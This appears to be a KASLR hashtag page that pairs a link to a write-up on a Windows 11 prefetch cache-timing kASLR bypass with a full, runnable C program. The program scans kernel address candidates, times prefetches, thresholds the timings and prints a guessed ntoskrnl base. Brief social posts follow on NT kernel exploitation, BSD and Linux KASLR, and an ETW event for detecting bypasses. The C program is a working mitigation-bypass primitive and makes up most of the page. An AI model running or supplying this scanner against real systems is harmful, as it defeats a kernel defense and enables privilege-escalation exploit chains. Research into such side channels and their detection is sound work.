Bypassing kASLR via Cache Timing
Explores a prefetch side-channel attack to bypass kASLR on Windows 11 by measuring cache access times to locate the kernel base address.
https://r0keb.github.io/posts/Bypassing-kASLR-via-Cache-Timing/
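As an added illustration of the two pieces such a scan needs (this is example code written for this page, not code from the linked post): a timing primitive that measures how long a prefetch of a candidate address takes, and a selection step that turns one timing per 2 MiB candidate into a guessed base. Everything Windows-specific here is an assumption: that ntoskrnl lives in the range 0xFFFFF80000000000 to 0xFFFFF80800000000 on a 2 MiB boundary, that mapped kernel pages give the shorter prefetch time (flip the comparison if the signal on a given machine is inverted), and that a real hit shows up as a run of several consecutive fast candidates because the image spans many 2 MiB pages. The constants `KERNEL_RANGE_START`, `KERNEL_STRIDE`, `TRIALS` and `MIN_RUN` and the helper names are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

/* Assumed layout (not from the page): the kernel image is mapped somewhere in
 * this range on a 2 MiB boundary, so only every 2 MiB address is probed. */
#define KERNEL_RANGE_START 0xFFFFF80000000000ULL
#define KERNEL_RANGE_END   0xFFFFF80800000000ULL
#define KERNEL_STRIDE      0x200000ULL
#define NUM_CANDIDATES ((size_t)((KERNEL_RANGE_END - KERNEL_RANGE_START) / KERNEL_STRIDE))
#define TRIALS   32   /* timings per candidate; the minimum is kept */
#define MIN_RUN  4    /* consecutive fast candidates needed before a hit is believed */

uintptr_t candidate_address(size_t i) {
    return (uintptr_t)(KERNEL_RANGE_START + (uint64_t)i * KERNEL_STRIDE);
}

static inline uint64_t rd_timestamp(void) {
#if defined(__x86_64__) || defined(__i386__)
    unsigned int aux;
    return __rdtscp(&aux);           /* waits for earlier loads before reading TSC */
#else
    struct timespec ts;              /* coarse fallback so the code builds elsewhere */
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* Time a single prefetch. A prefetch never faults, even on a kernel address,
 * but its latency depends on the state of that address's translation, which is
 * the side channel. */
uint64_t time_prefetch(uintptr_t addr) {
    uint64_t t0 = rd_timestamp();
    __builtin_prefetch((const void *)addr, 0, 3);
    uint64_t t1 = rd_timestamp();
    return t1 - t0;
}

/* Minimum over several trials: the floor is the least noisy estimate. */
uint64_t min_prefetch_time(uintptr_t addr, int trials) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < trials; i++) {
        uint64_t t = time_prefetch(addr);
        if (t < best) best = t;
    }
    return best;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Data-driven threshold: halfway between the fastest sample and the median.
 * Almost every candidate is unmapped, so the median is the "slow" baseline. */
uint64_t pick_threshold(const uint64_t *t, size_t n) {
    uint64_t *copy = malloc(n * sizeof *copy);
    memcpy(copy, t, n * sizeof *copy);
    qsort(copy, n, sizeof *copy, cmp_u64);
    uint64_t lo = copy[0], median = copy[n / 2];
    free(copy);
    return lo + (median - lo) / 2;
}

/* A real hit is a run of fast candidates (the image covers many 2 MiB pages);
 * a lone fast outlier is treated as noise. Returns the index where the first
 * run of at least min_run fast candidates starts, or (size_t)-1 if none. */
size_t find_base_index(const uint64_t *t, size_t n, uint64_t threshold, size_t min_run) {
    size_t run = 0;
    for (size_t i = 0; i < n; i++) {
        if (t[i] <= threshold) {
            if (++run == min_run) return i + 1 - min_run;
        } else {
            run = 0;
        }
    }
    return (size_t)-1;
}

/* Full scan: the guessed base, or 0 when there is no convincing run. */
uintptr_t scan_for_kernel_base(void) {
    uint64_t *t = malloc(NUM_CANDIDATES * sizeof *t);
    for (size_t i = 0; i < NUM_CANDIDATES; i++)
        t[i] = min_prefetch_time(candidate_address(i), TRIALS);
    uint64_t thr = pick_threshold(t, NUM_CANDIDATES);
    size_t idx = find_base_index(t, NUM_CANDIDATES, thr, MIN_RUN);
    free(t);
    return idx == (size_t)-1 ? 0 : candidate_address(idx);
}

int main(void) {
    uintptr_t base = scan_for_kernel_base();
    if (base)
        printf("candidate kernel base: 0x%llx\n", (unsigned long long)base);
    else
        printf("no clear timing signal (expected outside the assumed Windows layout)\n");
    return 0;
}
```

The selection logic is the part worth testing offline: feed it constructed timings with one spurious fast sample and one genuine run and check that only the run is reported. On a machine where the layout assumption does not hold (any non-Windows host, or a different kernel range) the scan prints the "no clear signal" line, which is the correct negative result rather than a fabricated address.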
#Exploiting the #NT #Kernel in 24H2: New Bugs in Old Code & Side Channels Against #KASLR
@mdhughes @Reiddragon this is oversimplifying by A LOT. For instance: some desktop things work better on #OpenBSD than #FreeBSD. #NetBSD was the first #BSD to implement #KASLR, before OpenBSD. It's not black and white and hasn't been for years now, yet everybody copies the same fake mantras about these 3 BSDs.
#Linux Will Stop Randomizing Per-CPU Entry Area When #KASLR Is Not Active
https://www.phoronix.com/news/Linux-Random-Per-CPU-Entry-ASLR
Original tweet: https://twitter.com/phoronix/status/1640020726924161024
A new ETW event, […] that could point at various suspicious behaviors of #KASLR bypasses